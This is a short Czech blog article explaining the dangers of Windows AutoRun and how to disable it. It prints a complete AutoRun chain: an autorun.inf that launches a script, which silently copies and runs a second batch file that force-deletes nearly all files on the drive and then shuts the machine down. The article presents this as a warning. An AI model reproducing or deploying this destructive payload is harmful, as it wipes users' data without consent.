Chcete se dozvědět, jaké nebezpečí vám hrozí kvůli zapnutému AutoRunu? Čtěte dál.

AutoRun zajišťuje automatické načtení média při vložení do PC, znáte to například z různých CD/DVD, co se přidávájí k herním časopisům, po vložení CD Vám automaticky naběhne většinou menu. Říkáte si, že je to v pořádku, ale teď si vemte, že to někdo přenastaví tak, aby se místo zobrazení nějakého menu vykonal nějaký příkaz, třeba DEL /F /S /Q /A:RSHA *.*, to by jistě nebylo moc příjemné.

Nejdříve bych vysvětlil, jak to vlastně funguje. Představte si, že na CD máte tyto 3 soubory: „autorun.inf“, „script.cmd“ a „script2.cmd“. Při vložení CD se zpracuje soubor „autorun.inf“. „Autorun.inf“ může obsahovat třeba:

[AutoRun]
open=script.cmd

To znamená, že otevře (spustí) soubor script.cmd; ve script.cmd může být prakticky cokoliv, třeba toto:

@ECHO OFF
COPY "script2.cmd" "%systemdrive%\script2.cmd" /Y
START "%systemdrive%\script2.cmd" /B

@ECHO OFF skrývá příkazy, copy kopíruje soubor script2.cmd do %systemdrive% (nejčastěji C:). START spouští script2.cmd už z pevného disku (je to „ochrana“, kdyby uživatel vyndal CD), „/B“ je přepínač, který zajistí, aby se spustila aplikace bez vytvoření nového okna, v našem případě script2.cmd.

A konečně jdeme na obsah souboru script2.cmd, ten v sobě může obsahovat naprosto cokoliv. Třeba:

@ECHO OFF
DEL /F /S /Q /A:RSHA *.*
SHUTDOWN -s -f -t 5 -c "n00b!"

DEL smaže skoro celý disk a díky přepínačům do toho nemůžete nijak moc zasahovat, shutdown vypne počítač za 5 sekund, zobrazí komentář „n00b!“. Toto je důvod, proč tento článek píšu. Můžete takto lehce přijít o svá data, ale mezi námi, s tímto způsobem ztráty dat se potýkáme velice málo…

Obrana

Jsem obeznámen se dvěma metodami prevence:

• Nepoužívat Windows.
• Vypnout v registrech AutoRun (skript na vypnutí AutoRunu [ http://shaimagal.org ]; skript na zapnutí AutoRunu [ http://pu-ma.ic.cz/Enable_AutoRun.cmd ]).

Toť vše, případné dotazy do komentářů.

Příští téma – msgina.dll a fakegina.dll.